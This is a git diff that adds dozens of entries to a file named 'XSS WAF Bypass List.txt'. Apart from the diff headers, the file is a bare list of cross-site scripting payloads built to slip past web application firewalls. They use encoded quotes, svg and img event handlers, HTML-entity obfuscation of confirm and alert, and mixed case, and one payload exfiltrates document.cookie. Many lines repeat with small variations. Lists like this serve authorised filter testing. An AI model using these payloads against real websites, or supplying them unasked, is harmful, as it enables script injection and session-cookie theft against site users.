diff --git a/XSS WAF Bypass List.txt b/XSS WAF Bypass List.txt index 23dde89..301c166 100644 --- a/XSS WAF Bypass List.txt +++ b/XSS WAF Bypass List.txt @@ -1,4 +1,7 @@ '"> +'"> +'"> +%27"> %27"> %27/onerror=alert(1)/%27 /confirm?.(1)/ @@ -11,6 +14,8 @@
+1%27%22%3E%3CImg+Src%3DOnXSS+OnError%3Dalert%28document.cookie%29%3E +1%27"> // @@ -38,3 +43,42 @@ confirm?.(1) 1'"<�!--�><�Img/Src/On�Error=(conf�irm)(1)> '/*\'/*"/*\"/* + + +">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> +<img src='1' onerror='alert(0)' < +`<svg onload='1`'alert(0)'` +%3cscript+%2f*%2500*%2f%3e%2f*%2500*%2falert(1)%2f*%2500*%2f%3c%2fscript+%2f*%2500*%2f +"><body/oNpagEshoW=(confirm)(document.domain)> +<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` // +%27%22%3E%3CImg%20Src=OnXSS%20OnError=alert(1)%3E +")%27--><SvG/oNlOaD=(confirm)(1)<!--" +")%27--><Svg/oNloAd=(co&#x6e;firm)(1)<!--" +")%27--><sVG/oNLoaD=(c&#111;nfirm)(1)<!--" +")%27--><SvG/oNloAd=(&#99;onfirm)(1)<!--" +")%27--><SvG/onLoAD=(con&#x66;irm)(1)<!--" +")%27--><SvG/onLoAD=(&#99;onfirm)(1)<!--" +")%27--><sVg/onload=(confirm)(1)--!>" +")%27--><sVG/onLoad=(confi&#114;m)(1)<!--" +")%27--><sVG/onLoad=(conf&#105;rm)(1)<!--" +")%27--><SvG/onLoad=(confirm)(1)<!--" +")%27--><sVG/onLoad=(confi&#x72;m)(1)<!--" +")%27--><sVG/onload=(co&#110;firm)(1)<!--" +")%27--><sVG/onLoaD=(confirm)(1)--!>" +")%27--><sVG/onLoaD=(co&#110;firm)(1)<!--" +")%27--><sVG/onLoaD=(conf&#105;rm)(1)<!--" +")%27--><SvG/onload=(co&#110;firm)(1)<!--" +")%27--><SvG/onload=(co&#110;firm)(1)--!>" +")%27--><SvG/onLoad=(confirm)(1)--!>" +")%27--><sVG/onLoad=(confirm)(1)--!>" +")%27--><SvG/onLoAd=(confirm)(1)<!--" +")%27--><sVG/onLoaD=(conf&#105;rm)(1)<!--" +")%27--><sVG/onLoaD=(confi&#x72;m)(1)<!--" +")%27--><sVG/onLoad=(confirm)(1)--!>" +")%27--><SvG/onLoad=(conf&#105;rm)(1)--!>" +")%27--><SvG/onLoaD=(co&#110;firm)(1)<!--" +")%27--><sVG/onload=(conf&#105;rm)(1)<!--" +")%27--><sVG/onload=(conf&#105;rm)(1)--!>" +")%27--><SvG/onLoaD=(co&#110;firm)(1)--!>" +")%27--><SvG/onLoad=(confirm)(1)--!>" +")%27--><sVG/onload=(co&#110;firm)(1)<!--"